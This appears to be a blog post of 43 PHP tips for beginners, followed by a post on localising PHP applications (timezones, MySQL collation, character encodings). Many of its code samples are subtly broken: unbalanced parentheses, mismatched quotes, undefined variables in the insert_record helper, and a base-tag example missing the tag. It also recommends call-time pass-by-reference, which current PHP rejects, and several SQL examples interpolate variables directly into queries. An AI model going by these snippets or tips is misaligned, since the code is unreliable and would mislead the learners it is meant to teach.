Never Ending Security

It starts all here

Many useful and handy Php tips for beginners

In this series we are going to look into some useful tips and techniques that can be used to improve and optimise your php code. Note that these php tips are meant for beginners and not those who are already using mvc frameworks etc.

The Techniques

1. Do not use relative paths , instead define a ROOT path

Its quite common to see such lines :

1
require_once('../../lib/some_class.php');

This approach has many drawbacks :

It first searches for directories specified in the include paths of php , then looks from the current directory.
So many directories are checked.

When a script is included by another script in a different directory , its base directory changes to that of the including script.

Another issue , is that when a script is being run from cron , it may not have its parent directory as the working directory.

So its a good idea to have absolute paths :

1
2
3
4
define('ROOT' , '/var/www/project/');
require_once(ROOT . '../../lib/some_class.php');
//rest of the code

Now this is an absolute path and will always stay constant. But we can improve this further. The directory /var/www/project can change , so do we change it everytime ? No instead we make it portable using magic constants like __FILE__ . Take a closer look :

1
2
3
4
5
6
7
//suppose your script is /var/www/project/index.php
//Then __FILE__ will always have that full path.
define('ROOT' , pathinfo(__FILE__, PATHINFO_DIRNAME));
require_once(ROOT . '../../lib/some_class.php');
//rest of the code

So now even if you shift your project to a different directory , like moving it to an online server , the same code will run without any changes.

2. Dont use require , include , require_once or include_once

Your script could be including various files on top , like class libraries , files for utility and helper functions etc like this :

1
2
3
4
require_once('lib/Database.php');
require_once('lib/Mail.php');
require_once('helpers/utitlity_functions.php');

This is rather primitive. The code needs to be more flexible. Write up helper functions to include things more easily. Lets take an example :

1
2
3
4
5
6
7
8
9
function load_class($class_name)
{
    //path to the class file
    $path = ROOT . '/lib/' . $class_name . '.php');
    require_once( $path );
}
load_class('Database');
load_class('Mail');

See any difference ? You must. It does not need any more explanation.
You can improve this further if you wish to like this :

1
2
3
4
5
6
7
8
9
10
function load_class($class_name)
{
    //path to the class file
    $path = ROOT . '/lib/' . $class_name . '.php');
    
    if(file_exists($path))
    {
        require_once( $path );
    }
}

There are a lot of things that can be done with this :

Search multiple directories for the same class file.
Change the directory containing class files easily , without breaking the code anywhere.
Use similar functions for loading files that contain helper functions , html content etc.

3. Maintain debugging environment in your application

During development we echo database queries , dump variables which are creating problems , and then once the problem is solved , we comment them or erase them. But its a good idea to let everything stay and help in the long run

On your development machine you can do this :

1
2
3
4
5
6
7
8
9
10
11
12
13
define('ENVIRONMENT' , 'development');
if(! $db->query( $query )
{
    if(ENVIRONMENT == 'development')
    {
        echo "$query failed";
    }
    else
    {
        echo "Database error. Please contact administrator";
    }   
}

And on the server you can do this :

1
2
3
4
5
6
7
8
9
10
11
12
13
define('ENVIRONMENT' , 'production');
if(! $db->query( $query )
{
    if(ENVIRONMENT == 'development')
    {
        echo "$query failed";
    }
    else
    {
        echo "Database error. Please contact administrator";
    }   
}

4. Propagate status messages via session

Status messages are those messages that are generated after doing a task.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
if($wrong_username || $wrong_password)
{
    $msg = 'Invalid username or password';
}
?>
<html>
<body>
<?php echo $msg; ?>
<form>
...
</form>
</body>
</html>

Code like that is common. Using variables to show status messages has limitations. They cannot be send via redirects (unless you propagate them as GET variables to the next script , which is very silly). In large scripts there might be multiple messages etc.

Best way is to use session to propagate them (even if on same page). For this there has to be a session_start on every page.

1
2
3
4
5
6
7
8
9
10
11
function set_flash($msg)
{
    $_SESSION['message'] = $msg;
}
function get_flash()
{
    $msg = $_SESSION['message'];
    unset($_SESSION['message']);
    return $msg;
}

and in your script :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
if($wrong_username || $wrong_password)
{
    set_flash('Invalid username or password');
}
?>
<html>
<body>
Status is : <?php echo get_flash(); ?>
<form>
...
</form>
</body>
</html>

5. Make your functions flexible

1
2
3
4
5
6
function add_to_cart($item_id , $qty)
{
    $_SESSION['cart'][$item_id] = $qty;
}
add_to_cart( 'IPHONE3' , 2 );

When adding a single item you use the above function. When adding multiple items , will you create another function ? NO. Just make the function flexible enough to take different kinds of parameters. Have a closer look :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
function add_to_cart($item_id , $qty)
{
    if(!is_array($item_id))
    {
        $_SESSION['cart'][$item_id] = $qty;
    }
    else
    {
        foreach($item_id as $i_id => $qty)
        {
            $_SESSION['cart'][$i_id] = $qty;
        }
    }
}
add_to_cart( 'IPHONE3' , 2 );
add_to_cart( array('IPHONE3' => 2 , 'IPAD' => 5) );

So now the same function can accept different kinds of output. The above can be applied in lots of places to make your code more agile.

6. Omit the closing php tag if it is the last thing in a script

I wonder why this tip is omitted from so many blog posts on php tips.

1
2
3
4
5
<?php
echo "Hello";
//Now dont close this tag

This will save you lots of problem. Lets take an example :

A class file super_class.php

1
2
3
4
5
6
7
8
9
10
<?php
class super_class
{
    function super_function()
    {
        //super code
    }
}
?>
//super extra character after the closing tag

Now index.php

1
2
3
require_once('super_class.php');
//echo an image or pdf , or set the cookies or session data

And you will get Headers already send error. Why ? because the “super extra character” has been echoed , and all headers went along with that. Now you start debugging. You may have to waste many hours to find the super extra space.

Hence make it a habit to omit the closing tag :

1
2
3
4
5
6
7
8
9
10
<?php
class super_class
{
    function super_function()
    {
        //super code
    }
}
//No closing tag

Thats better.

7. Collect all output at one place , and output at one shot to the browser

This is called output buffering. Lets say you have been echoing content from different functions like this :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
function print_header()
{
    echo "<div id='header'>Site Log and Login links</div>";
}
function print_footer()
{
    echo "<div id='footer'>Site was made by me</div>";
}
print_header();
for($i = 0 ; $i < 100; $i++)
{
    echo "I is : $i <br />';
}
print_footer();

Instead of doing like that , first collect all output in one place. You can either store it inside variables in the functions or use ob_start and ob_end_clean. So now it should look like

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
function print_header()
{
    $o = "<div id='header'>Site Log and Login links</div>";
    return $o;
}
function print_footer()
{
    $o = "<div id='footer'>Site was made by me</div>";
    return $o;
}
echo print_header();
for($i = 0 ; $i < 100; $i++)
{
    echo "I is : $i <br />';
}
echo print_footer();

So why should you do output buffering :

  • You can change the output just before sending it to browser if you need to. Think about doing some str_replaces , or may be preg_replaces or may be adding some extra html at the end like profiler/debugger output
  • Its a bad idea to send output to browser and do php processing at the same time. Have you ever seen a website where there is a Fatal error in the sidebar or in a box in the middle of the screen. You know why that happens ? Because processing and output are being mixed.

8. Send correct mime types via header when outputting non-html content

Lets echo some xml.

1
2
3
4
5
6
7
$xml = '<?xml version="1.0" encoding="utf-8" standalone="yes"?>';
$xml = "<response>
  <code>0</code>
</response>";
//Send xml data
echo $xml;

Works fine. But it needs some improvement.

1
2
3
4
5
6
7
8
$xml = '<?xml version="1.0" encoding="utf-8" standalone="yes"?>';
$xml = "<response>
  <code>0</code>
</response>";
//Send xml data
header("content-type: text/xml");
echo $xml;

Note that header line. That line tells the browser that the content is xml content. So the browser can handle it correctly. Many javascript libraries also rely on header information.

Similarly for javascript , css , jpg image , png image :

Javascript

1
2
header("content-type: application/x-javascript");
echo "var a = 10";

CSS

1
2
header("content-type: text/css");
echo "#div id { background:#000; }";

9. Set the correct character encoding for a mysql connection

Ever faced a problem that unicode/utf-8 characters are stored in mysql table correctly , phpmyadmin also shows them correct , but when you fetch them and echo on your page they do not show up correctly. The secret is mysql connection collation.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$host = 'localhost';
$username = 'root';
$password = 'super_secret';
//Attempt to connect to database
$c = mysqli_connect($host , $username, $password);
        
//Check connection validity
if (!$c
{
    die ("Could not connect to the database host: <br />". mysqli_connect_error());
}
        
//Set the character set of the connection
if(!mysqli_set_charset ( $c , 'UTF8' ))
{
    die('mysqli_set_charset() failed');
}

Once you connect to the database , its a good idea to set the connections characterset. This is a must when you are working with multiple languages in your application.

Otherwise what will happen ? You will see lots of boxes and ???????? in non english text.

10. Use htmlentities with the correct characterset option

Prior to php 5.4 the default character encoding used is ISO-8859-1 which cannot display characters like À â etc.

1
$value = htmlentities($this->value , ENT_QUOTES , 'UTF-8');

Php 5.4 onwards the default encoding will be UTF-8 which will solve most problems , but still better be aware about it if your application is multilingual.

11. Do not gzip output in your application , make apache do that

Thinking of using ob_gzhandler ? No dont do that. It doesnt make sense. Php is supposed to write your application. Dont worry about how to optimise data transfer between server and browser inside Php.

Use apache mod_gzip/mod_deflate to compress content via the .htaccess file.

12. Use json_encode when echoing javascript code from php

There are times when some javascript code is generated dynamically from php.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$images = array(
 'myself.png' , 'friends.png' , 'colleagues.png'
);
$js_code = '';
foreach($images as $image)
{
$js_code .= "'$image' ,";
}
$js_code = 'var images = [' . $js_code . ']; ';
echo $js_code;
//Output is var images = ['myself.png' ,'friends.png' ,'colleagues.png' ,];

Be smart. use json_encode :

1
2
3
4
5
6
7
8
9
$images = array(
 'myself.png' , 'friends.png' , 'colleagues.png'
);
$js_code = 'var images = ' . json_encode($images);
echo $js_code;
//Output is : var images = ["myself.png","friends.png","colleagues.png"]

Isn’t that neat ?

13. Check if directory is writable before writing any files

Before writing or saving any file , make sure you check that the directory is writable or not , and flash an error message if it is not. This will save you a lot of “debugging” time. When you are working on a linux , permissions have to be dealt with and there would be many many permission issues when directories would not be writable , files would not be readable and so on.

Make sure that your application is as intelligent as possible and reports the most important information in the shortest time.

1
2
3
4
$contents = "All the content";
$file_path = "/var/www/project/content.txt";
file_put_contents($file_path , $contents);

That is totally correct. But has some indirect problems. The file_put_contents may fail for a number of reasons :

  • Parent directory does not exist
  • Directory exists , but is not writable
  • File locked for writing ?

So its better to make everything clear before writing out to a file.

1
2
3
4
5
6
7
8
9
10
11
12
$contents = "All the content";
$dir = '/var/www/project';
$file_path = $dir . "/content.txt";
if(is_writable($dir))
{
    file_put_contents($file_path , $contents);
}
else
{
    die("Directory $dir is not writable, or does not exist. Please check");
}

By doing this you get the accurate information that where is a file write failing and why

14. Change permission of files that your application creates

When working in linux environment , permission handling can waste a lot of your time. Hence whenever your php application creates some files do a chmod over them to ensure they are “accessible” outside. Otherwise for example the files may be created by “php” user and you are working as a different user and the system wont let you access or open the file , and then you have to struggle to get root privileges , change the permissions of the file and so on.

1
2
3
4
5
// Read and write for owner, read for everybody else
chmod("/somedir/somefile", 0644);
// Everything for owner, read and execute for others
chmod("/somedir/somefile", 0755);

15. Don’t check submit button value to check form submission

1
2
3
4
if($_POST['submit'] == 'Save')
{
    //Save the things
}

The above is mostly correct , except when your application is multi-lingual. Then the ‘Save’ can be many different things. How would you compare then. So do not rely on the value of submit button. Instead use this :

1
2
3
4
if( $_SERVER['REQUEST_METHOD'] == 'POST' and isset($_POST['submit']) )
{
    //Save the things
}

Now you are free from the value the submit button

16. Use static variables in function where they always have same value

1
2
3
4
5
6
7
8
9
//Delay for some time
function delay()
{
    $sync_delay = get_option('sync_delay');
        
    echo "<br />Delaying for $sync_delay seconds...";
    sleep($sync_delay);
    echo "Done <br />";
}

Instead use static variables as :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
//Delay for some time
function delay()
{
    static $sync_delay = null;
    
    if($sync_delay == null)
    {
    $sync_delay = get_option('sync_delay');
    }
    
    echo "<br />Delaying for $sync_delay seconds...";
    sleep($sync_delay);
    echo "Done <br />";
}

17. Don’t use the $_SESSION variable directly

Some simple examples are :

1
2
$_SESSION['username'] = $username;
$username = $_SESSION['username'];

But this has a problem. If you are running multiple applications on the same domain , the session variables my conflict. 2 different applications may set the same key name in the session variable. Take for example , a frontend portal , and the backend management application , on the same domain.

Hence use application specific keys with wrapper functions :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
define('APP_ID' , 'abc_corp_ecommerce');
//Function to get a session variable
function session_get($key)
{
    $k = APP_ID . '.' . $key;
   
    if(isset($_SESSION[$k]))
    {
        return $_SESSION[$k];
    }
    
    return false;
}
//Function set the session variable
function session_set($key , $value)
{
    $k = APP_ID . '.' . $key;
    $_SESSION[$k] = $value;
    
    return true;
}

18. Wrap utility helper functions into a class

So you have a lot of utility functions in a file like :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
function utility_a()
{
    //This function does a utility thing like string processing
}
function utility_b()
{
    //This function does nother utility thing like database processing
}
function utility_c()
{
    //This function is ...
}

And you use the function throughout your application freely. You may want to wrap them into a class as static functions :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
class Utility
{
    public static function utility_a()
    {
        
    }
    
    public static function utility_b()
    {
        
    }
    public static function utility_c()
    {
        
    }
}
//and call them as
$a = Utility::utility_a();
$b = Utility::utility_b();

One clear benefit you get here is if php has inbuilt functions with similar names , then names will not conflict.
Another perspective , though little advanced is that you can maintain multiple versions of the same class in the same application without any conflict. Its basically encapsulation , nothing else.

19. Bunch of silly tips

  • Use echo instead of print
  • Use str_replace instead of preg_replace , unless you need it absolutely
  • Do not use short tags
  • Use single quotes instead of double quotes for simple strings
  • Always remember to do an exit after a header redirect
  • Never put a function call in a for loop control line.
  • isset is faster than strlen
  • Format your code correctly and consistently
  • Do not drop the brackets of loops or if-else blocks.
    Do not code like this :

    1
    if($a == true) $a_count++;

    Its absolutely a WASTE.

    Write

    1
    2
    3
    4
    if($a == true)
    {
        $a_count++;
    }

    Dont try to make your code shorter by eating up syntax. Rather make your logic shorter.

  • Use a proper text editor which has code highlighting. Code highlighting helps to create lesser errors.

20. Process arrays quickly with array_map

Lets say you want to trim all elements of an array. Newbies do it like this :

1
2
3
4
foreach($arr as $c => $v)
{
    $arr[$c] = trim($v);
}

But it can more cleaner with array_map :

1
$arr = array_map('trim' , $arr);

This will apply trim on all elements of the array $arr. Another similar function is array_walk. Check out the
documentation on these to know more.

21. Validate data with php filters

Have you been using to regex to validate values like email , ip address etc. Yes everybody had been doing that. Now lets
try something different, called filters.

The php filter extension provides simple way to validate or check values as being a valid ‘something’.

22. Force type checking

1
2
$amount = intval( $_GET['amount'] );
$rate = (int) $_GET['rate'];

Its a good habit.

23. Write Php errors to file using set_error_handler()

set_error_handler() can be used to set a custom error handler. A good idea would be write some important errors in a file for logging purpose

24. Handle large arrays carefully

Large arrays or strings , if a variable is holding something very large in size then handle with care. Common mistake is to create a copy and then run out of memory and get a Fatal Error of Memory size exceeded :

1
2
3
4
5
$db_records_in_array_format; //This is a big array holding 1000 rows from a table each having 20 columns , every row is atleast 100 bytes , so total 1000 * 20 * 100 = 2MB
$cc = $db_records_in_array_format; //2MB more
some_function($cc); //Another 2MB ?

The above thing is common when importing a csv file or exporting table to a csv file

Doing things like above can crashs scripts quite often due to memory limits. For small sized variables its not a problem , but must be avoided when handling large arrays.

Consider passing them by reference , or storing them in a class variable :

1
2
$a = get_large_array();
pass_to_function(&$a);

by doing this the same variable (and not its copy) will be available to the function. Checkdocumentation

1
2
3
4
5
6
7
8
9
10
11
12
13
class A
{
    function first()
    {
        $this->a = get_large_array();
        $this->pass_to_function();
    }
    function pass_to_function()
    {
        //process $this->a
    }
}

unset them as soon as possible , so that memory is freed and rest of the script can relax.

Here is a simple demonstration of how assign by reference can save memory in some cases

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
ini_set('display_errors' , true);
error_reporting(E_ALL);
$a = array();
for($i = 0; $i < 100000 ; $i++)
{
    $a[$i] = 'A'.$i;
}
echo 'Memory usage in MB : '. memory_get_usage() / 1000000 . '<br />';
$b = $a;
$b[0] = 'B';
echo 'Memory usage in MB after 1st copy : '. memory_get_usage() / 1000000 . '<br />';
$c = $a;
$c[0] = 'B';
echo 'Memory usage in MB after 2st copy : '. memory_get_usage() / 1000000 . '<br />';
$d =& $a;
$d[0] = 'B';
echo 'Memory usage in MB after 3st copy (reference) : '. memory_get_usage() / 1000000 . '<br />';

The output on a typical php 5.4 machine is :

Memory usage in MB : 18.08208
Memory usage in MB after 1st copy : 27.930944
Memory usage in MB after 2st copy : 37.779808
Memory usage in MB after 3st copy (reference) : 37.779864

So it can be seen that in the 3rd copy which was by reference memory was saved. Otherwise in all plain copies memory is used up more and more.

25. Use a single database connection, throughout the script

Make sure that you use a single connection to your database throughout your script. Open a connection right in the beginning and use it till the end , and close it at the end. Do not open connections inside functions like this :

1
2
3
4
5
6
7
8
9
10
11
function add_to_cart()
{
    $db = new Database();
    $db->query("INSERT INTO cart .....");
}
function empty_cart()
{
    $db = new Database();
    $db->query("DELETE FROM cart .....");
}

Having multiple connections is a bad idea and moreover they slow down the execution since every connection takes time to create and uses more memory.

Use the singleton pattern for special cases like database connection.

26. Avoid direct SQL query , abstract it

1
2
$query = "INSERT INTO users(name , email , address , phone) VALUES('$name' , '$email' , '$address' , '$phone')";
$db->query($query); //call to mysqli_query()

The above is the simplest way way of writing sql queries and interacting with databases for operations like INSERT, UPDATE, DELETE etc. But it has few drawbacks like:

  • All values have to be escaped everytime manually
  • Manually verify the sql syntax everytime.
  • Wrong queries may go undetected for a long time (unless if else checking done everytime)
  • Difficult to maintain large queries like that

Solution: ActiveRecord

It involves writing simple functions that abstract the generation of sql queries, hence avoid writing of direct sql queries.

A very simple example of an activerecord insert function can be like this :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
function insert_record($table_name , $data)
{
    foreach($data as $key => $value)
    {
    //mysqli_real_escape_string
        $data[$key] = $db->mres($value);
    }
        
    $fields = implode(',' , array_keys($data));
    $values = "'" . implode("','" , array_values($data)) . "'";
    
    //Final query  
    $query = "INSERT INTO {$table}($fields) VALUES($values)";
        
    return $db->query($query);
}
//data to be inserted in database
$data = array('name' => $name , 'email' => $email  , 'address' => $address , 'phone' => $phone);
//perform the INSERT query
insert_record('users' , $data);

The above example shows how to insert data in a database, without actually having to write INSERT statements. The function insert_record takes care of escaping data as well. A big advantage here is that since the data is being prepared as a php array, any syntax mistake is caught instantly (by the php interpreter ofcourse).

This function can be part of a database class, and callable like this $db->insert_record(). Similar functions can be written for update, select, delete as well. Should be a good practise.

27. Cache database generated content to static files

Pages that are generated by fetching content from the database like cms etc, can be cached. It means that once generated, a copy of it can be writted to file. Next time the same page is requested, then fetch it from the cache directory, dont query the database again.

Benefits :

  • Save php processing to generate the page , hence faster execution
  • Lesser database queries means lesser load on mysql database

28. Store sessions in database

File based sessions have many limitation. Applications using file based sessions cannot scale to multiple servers, since files are stored on a single server. But database can be access from multiple servers hence the the problem is solved there. Also on shared hosting, the session files reside in the tmp directory, which is readable by other accounts. This can be a security issue.

Storing session in database makes many other things easier like:

  • Restrict concurrent logins from same username. Same username cannot log in from 2 different places at same time
  • Check online status of users more accurately

29. Avoid using globals

  • Use defines/constants
  • Get value using a function
  • Use Class and access via $this

30. Use base url in head tag

Quick example :

1
2
3
4
5
6
7
<head>
    <base href="http://www.domain.com/store/">
</head>
<body>
    <img src="happy.jpg" />
</body>
</html>

The base tag is like a ‘ROOT’ url for all relative urls in the html body. Its useful when static content files are organised into directories and subdirectories.

Lets take an example

http://www.domain.com/store/home.php
http://www.domain.com/store/products/ipad.php

In home.php the following can be written :

1
2
<a href="home.php">Home</a>
<a href="products/ipad.php">Ipad</a>

But in ipad.php the links have to be like this :

1
2
<a href="../home.php">Home</a>
<a href="ipad.php">Ipad</a>

This is because of different directories. For this multiple versions of the navigation html code has to be maintained. So the quick solution is base tag.

1
2
3
4
5
6
7
8
<head>
</head>
<body>
<a href="home.php">Home</a>
<a href="products/ipad.php">Ipad</a>
</body>
</html>

Now this particular code will work the same way in the home directory as well as the product directory. The base href value is used to form the full url for home.php and products/ipad.php

31. Manage error reporting

error_reporting is the function to use to set the necessary level of error reporting required.
On a development machine notices and strict messages may be disabled by doing.

1
2
ini_set('display_errors', 1);
error_reporting(~E_NOTICE & ~E_STRICT);

On production , the display should be disabled.

1
2
ini_set('display_errors', 0);
error_reporting(~E_WARNING & ~E_NOTICE & ~E_STRICT);

It is important to note that error_reporting should never be set to 0 on production machines. Atleast E_FATALs have to be known. Just switch off the display using the display_errors directive. If error_reporting is set to 0, errors wont be raised at all keeping all problems in the dark.

After the display is switched off, the errors should be logged to a file for later analysis. This can be done inside the script using init_set.

1
2
3
4
5
ini_set('log_errors' , '1');
ini_set('error_log' , '/path/to/errors.txt');
ini_set('display_errors' , 0);
error_reporting(~E_WARNING & ~E_NOTICE & ~E_STRICT);

Note :

1. The path ‘/path/to/errors.txt’ should be writable by the web server for errors to be logged there.

2. A separate error file is specified , otherwise all logs would go inside the apache/web server error log and get mixed up with other apache errors.

3. Also since it is being setup in the current application , the error log will contain the errors of only the current application (there may be other applications running on the webserver).

4. The path can be somewhere inside the directory of the current application as well , so that the system directories like /var/log dont have to searched.

5. Dont set error_reporting to 0. It will not log anything then.

Alternatively set_error_handler should be used to set a custom user written function as the error handler. That particular function, for example can log all errors to a file.

Set ‘display_errors=On’ in php.ini on development machine

On development machine its important to enable display_errors right in the php.ini (and not rely on ini_set)
This is because any compile time fatal errors will now allow ini_set to execute , hence no error display
and a blank WHITE page.

Similarly when they are On in php.ini , switching it off in a script that has fatal errors will not work.

Set ‘display_errors=Off’ in php.ini on production machine

Do not rely on init_set(‘display_errors’ , 0); simply because it will not get executed if any compile time fatal errors come in the script , and errors will be displayed right away.

32. Be aware of platform architecture

The length of integers is different on 32 and 64 bit architectures. So functions like strtotime give different results.

On a 64 bit machine you can see such output.

1
2
3
4
5
6
7
8
9
$ php -a
Interactive shell
php > echo strtotime("0000-00-00 00:00:00");
-62170005200
php > echo strtotime('1000-01-30');
-30607739600
php > echo strtotime('2100-01-30');
4104930600

But on a 32 bit machine all of them would give bool(false). Check here for more.

What would happen if an integer is left shifted more than 32 bits ? the result would be different on different machines.

33. Dont rely on set_time_limit too much

If you are limiting the maximum run-time of a script , by doing this :

1
2
3
set_time_limit(30);
//Rest of the code

It may not always work. Any execution that happens outside the script via system calls/os functions like socket operations, database operations etc. will not be under control of set_time_limit.

So if a database operation takes lot of time or “hangs” then the script will not stop. Dont be surprised then. Make better strategies to handle the run-time.

34. Make a portable function for executing shell commands

system , exec , passthru , shell_exec are the 4 functions that are available to execute system commands. Each has a slightly different behaviour. But the problem is that when you are working on shared hosting environments some of the functions are selectively disabled. Most newbie programmers tend to first find out which function is enabled and then use it.

A better solution :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
/**
    Method to execute a command in the terminal
    Uses :
    1. system
    2. passthru
    3. exec
    4. shell_exec
*/
function terminal($command)
{
    //system
    if(function_exists('system'))
    {
        ob_start();
        system($command , $return_var);
        $output = ob_get_contents();
        ob_end_clean();
    }
    //passthru
    else if(function_exists('passthru'))
    {
        ob_start();
        passthru($command , $return_var);
        $output = ob_get_contents();
        ob_end_clean();
    }
    //exec
    else if(function_exists('exec'))
    {
        exec($command , $output , $return_var);
        $output = implode("n" , $output);
    }
    //shell_exec
    else if(function_exists('shell_exec'))
    {
        $output = shell_exec($command) ;
    }
    else
    {
        $output = 'Command execution not possible on this system';
        $return_var = 1;
    }
    return array('output' => $output , 'status' => $return_var);
}
terminal('ls');

The above function will execute the shell command using whichever function is available , keeping your code consistent.

35. Localize your application

Localise your php application. Format dates and numbers with commas and decimals. Show the time according to timezone of the user.

36. Use a profiler like xdebug if you need to

Profilers are used to generate reports that show the time is taken by different parts of the code to execute. When writing large application where lots of libraries and other resources are working to do a cetain task, speed might be an important aspect to optimise.

Use profilers to check how your code is performing in terms of speed. Check out xdebug and webgrind.

37. Use plenty of external libraries

An application often needs more than what can be coded with basic php. Like generating pdf files, processing images, sending emails, generating graphs and documents etc. And there are lots of libraries out there for doing these things quickly and easily.

Few popular libraries are :

  • mPDF – Generate pdf documents, by converting html to pdf beautifully.
  • PHPExcel – Read and write Excel files
  • PhpMailer – Send html emails with attachments easily
  • pChart – Generate graphs in php

38. Have a look at phpbench for some micro-optimisation stats

If you really want to achieve optimisation at the level of microtime then check phpbench … it has some benchmarks for various syntax variations that can create significant difference.

39. Use an MVC framework

Its time to start using an MVC (Model view controller) framework like codeigniter. MVC does not make your code object oriented rightaway. The first thing they do is separate the php code from html code.

  • Clean separation of php and html code. Good for team work, when designers and coders are working together.
  • Functions and functionalities are organised in classes making maintenance easy.
  • Inbuilt libraries for various needs like email, string processing, image processing, file uploads etc.
  • Is a must when writing big applications
  • Lots of tips, techniques, hacks are already implemented in the framework

40. Read the comments on the php documentation website

The php documentation website has entries for each function, class and their methods. All those individual pages have got lots of user comments below them that contain a whole lot of valuable information from the community.

They contain user feedback, expert advice and useful code snippets. So check them out.

41. Go to the IRC channel to ask

The irc channel #php is the best place online to ask about php related things. Although there are lots of blogs, forums out there and even more coming up everyday, still when a specific problem arises the solution might not be available there. Then irc is the place to ask. And its totally free!!

42. Read open source code

Reading other open source applications is always a good idea to improve own skills if you have not already. Things to learn are techniques, coding style, comment style, organisation and naming of files etc.

The first open source thing that I read was the codeigniter framework. Its easy to developers to use, as well as easy to look inside. Here are a few more

1. Codeigniter
2. WordPress
3. Joomla CMS

43. Develop on Linux

If you are already developing on windows, then you might give Linux a try. My favorite is ubuntu. Although this is just an opinion but still I strongly feel that for development linux is a much better environment.

Php applications are mostly deployed on linux (LAMP) environments. Therefore, developing in a similar environment helps to produce a robust application faster.

Most of the development tools can be very easily installed from synaptic package manager in Ubuntu. Plus they need very little configuration to setup and run. And the best thing is, that they all are free.

Resources

http://www.phptherightway.com/


10+ tips to localise your php application


Localisation

Localisation involves changing various parts of application output like display of dates , time , numbers , language etc according to the standards of the geographical region of a user. Localisation is an important feature of applications that targets users across the globe and not just one region.

So here are a set of simple tips and techniques every php application can do to make itself more locale-friendly.

1. Set timezone of the application

The application should explicitly set a timezone for itself. Otherwise the timezone of the machine/server would be taken up, which may not be what the user wants.

1
date_default_timezone_set( 'America/Chicago' );

This should be done at the earliest in the script.

The timezone_identifiers_list() function can be used to generate a list of timezones from which the user can select. Here is a quick example :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/**
    @brief
    Get a list of timezones available for use in the application
*/
function get_timezones()
{
    $o = array();
    $t = timezone_identifiers_list();
    
    foreach($t as $a)
    {
        $t = '';
        
        //Get the time difference
        $zone = new DateTimeZone($a);
        $seconds = $zone->getOffset( new DateTime("now", $zone) );
        $hours = sprintf( "%+02d" , intval($seconds/3600));
        $minutes = sprintf( "%02d" , ($seconds%3600)/60 );
        
        $t = $a ."  [ $hours:$minutes ]" ;
        $o[$a] = $t;
    }
    ksort($o);
    
    return $o;
}

This would give you a complete list like this :

[Africa/Abidjan] => Africa/Abidjan [ +0:00 ]
[Africa/Accra] => Africa/Accra [ +0:00 ]
[Africa/Addis_Ababa] => Africa/Addis_Ababa [ +3:00 ]
[Africa/Algiers] => Africa/Algiers [ +1:00 ]
[Africa/Asmara] => Africa/Asmara [ +3:00 ]
[Africa/Bamako] => Africa/Bamako [ +0:00 ]
[Africa/Bangui] => Africa/Bangui [ +1:00 ]
[Africa/Banjul] => Africa/Banjul [ +0:00 ]
[Africa/Bissau] => Africa/Bissau [ +0:00 ]

Make a select tag dropdown out of it and let the user select his/her timezone.

2. Set the mysql timezone from the application

Applications are often hosted on servers that are in a different timezone , compared to that of the developer or the application user. Hence the timezone of mysql needs to be set properly to that of the application.

Mysql can be put in the same timezone as the application by doing :

1
2
$c = mysqli_connect($host, $username, $password);
mysqli_query($c , "SET `time_zone` = '".date('P')."'");

The php date function with P parameter gives the time difference between GMT and the applications timezone. The same is passed to mysql.

TIMESTAMP

For timestamp columns in mysql , any date-time combinations passed would be converted to correct timestamp by mysql , since mysql itself is in the correct timezone.

DATETIME

When using datetime columns , the application must convert the date-time values to UTC , and then save in mysql.
When fetching back from database they must be converted to the application’s timezone.

Save to database :

1
2
3
4
5
6
7
$time_to_save = date('Y-m-d h:i:s');    //Current time of user that is to be saved in a datetime mysql column
$d = new DateTime($time_to_save , new DateTimeZone(date_default_timezone_get()) );
$d->setTimezone( new DateTimeZone('UTC') );  //Move to UTC
$mysql_datetime = $d->format("Y-m-d h:i:s"); //BUZZ!! Ready to save datetime value in database

Note :

1. Since the mysql timezone is being set from within the application , certain queries may give tricky output. Here is an example :

You are developing an application on your local system and have set the timezone to ‘Asia/Singapore’ , but your own computer’s timezone is ‘Asia/Kolkata’

Now inside your application you are running a certain query :

1
2
3
4
5
$time_schedule = "2012-04-13 10:30:00"
$query = "SELECT * FROM table WHERE time_schedule = '$time_schedule'";
//Execute the query
//some rows

When you run the same query in phpmyadmin or mysql terminal and you might get different output/rows selected.

This happens because timezone of application+mysql is different from mysql outside. You application sees different time in the database column time_schedule and phpmyadmin/mysql terminal sees a different time.

3. Set collation for database at the time of creation

The collation of the database should be set to the correct one , right in the beginning.

ALTER DATABASE db_name CHARACTER SET utf8 COLLATE utf8_unicode_ci;

Or modify it from the Operations tab in phpmyadmin. Setting the collation and character set in the beginning ensures that all later tables, columns take up the same by default.

4. Set character set of mysql connection object

When the application is displaying non english charaters , then it must set the mysql connection’s character encoding. Its simple :

1
mysqli_set_charset ( $c , 'UTF8' );

5. Set correct character set for htmlentities

Function htmlentities is used to echo content , that was previously provided by the user.
Prior to php 5.4 the default character encoding used is ISO-8859-1 which cannot display languages like hindi , bengali , russian etc.

1
2
$value = htmlentities($value , ENT_QUOTES , 'UTF-8');
echo $value;

Php 5.4 onwards the default encoding will be UTF-8 which will solve most problems , but still better be aware about it if your application is multilingual.

The function mb_list_encodings can be used to generate a list.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/**
    @brief
    Get the list of supported encodings using the mb_list_encodings function
*/
function get_supported_encodings()
{
    $e = mb_list_encodings();
    
    $list = array();
    
    foreach($e as $c => $val)
    {
        $list[$val] = $val;
    }
    
    return $list;
}

Would generate a list like this :

